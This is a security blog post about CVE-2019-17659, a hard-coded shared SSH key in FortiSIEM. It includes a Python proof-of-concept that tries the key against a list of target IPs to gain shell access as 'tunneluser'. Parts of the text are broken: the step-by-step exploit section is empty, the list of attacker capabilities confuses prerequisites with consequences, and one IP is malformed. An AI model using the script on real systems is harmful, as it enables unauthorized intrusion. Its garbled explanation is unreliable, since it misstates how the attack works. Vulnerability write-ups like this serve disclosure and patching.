In enterprise environments, security management platforms are supposed to strengthen your defense—not add new vulnerabilities. But in late 2019, a dangerous flaw was revealed in FortiSIEM, a product relied on by many organizations for real-time threat detection and response. Let’s take a hands-on journey through what makes CVE-2019-17659 so serious, how attackers can exploit it, and what you can do if you’re at risk.
What is CVE-2019-17659?
CVE-2019-17659 is a vulnerability found in Fortinet’s FortiSIEM version 5.2.6 (and possibly others), which uses a hard-coded SSH private key, shared among all installations, to permit restricted SSH access for a user called tunneluser. If someone can get this key—even from another FortiSIEM device or its firmware—they can get in as if they were you. No password, no prior access required.
Why is This Bad?
This flaw lets an outsider gain SSH access as a "low-privileged" user (tunneluser) on the central supervisor (the core FortiSIEM system), simply by copying a private key. With SSH access, an attacker can:
* On a running FortiSIEM system, log in as root or a privileged user.
* Browse to the ~tunneluser/.ssh/ directory, or check typical system image locations (e.g., /opt/phoenix/ or /home/tunneluser/).
Example: reading the private key by root
cat /home/tunneluser/.ssh/id_rsa
Extracting from Firmware
Attackers can also extract the key by downloading the FortiSIEM firmware/image (often available on the vendor's support portal to legitimate users or by reverse engineering), and search for .ssh folders or private key strings within the filesystem.
Exploit Step-by-Step
Let's say our attacker has gotten this private key from another installation, or from a leaked firmware image:
Result
The attacker now has a shell as tunneluser without ever knowing a password. Depending on how the system is set up, they may quickly find ways to escalate to a more privileged account.
Proof-of-Concept Code Example
Here’s a barebones Python script to automate the attempt, given a list of FortiSIEM IPs and the fetched private key:
import paramiko
private_key_path = 'id_rsa' # Path to the downloaded/extracted key file
username = 'tunneluser'
targets = ['192..2.10', '198.51.100.22'] # Replace with your targets
for ip in targets:
try:
key = paramiko.RSAKey.from_private_key_file(private_key_path)
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ip, username=username, pkey=key, timeout=5)
print(f"SUCCESS: Connected to {ip} as {username}")
ssh.close()
except Exception as e:
print(f"Failed to connect to {ip}: {e}")
References
* NVD Entry: CVE-2019-17659
* Fortinet Advisory: FortiSIEM Hardcoded Tunneluser SSH Key *(archived)*
* Exposure write-up: SSD Advisory – FortiSIEM Hardcoded SSH Key
* Exploit PoC: GitHub PoC by phackt
Key Hygiene
After update, check all users and SSH keys on all FortiSIEM systems are unique. Remove/replace the default tunneluser key if possible.
Conclusion
CVE-2019-17659 shows that even “low-privileged” accounts can open very wide doors, especially when combined with easy-to-copy secrets like hard-coded cryptographic keys. Always treat vendor updates seriously and audit for shared or default credentials wherever possible!
Stay Safe
Don’t let your security platform become the entry point for attackers. Check your FortiSIEM today and close the hole for good.
*This post is for educational purposes. Do not use these details or code for unauthorized access.*
Timeline
Published on: 03/17/2025 14:15:16 UTC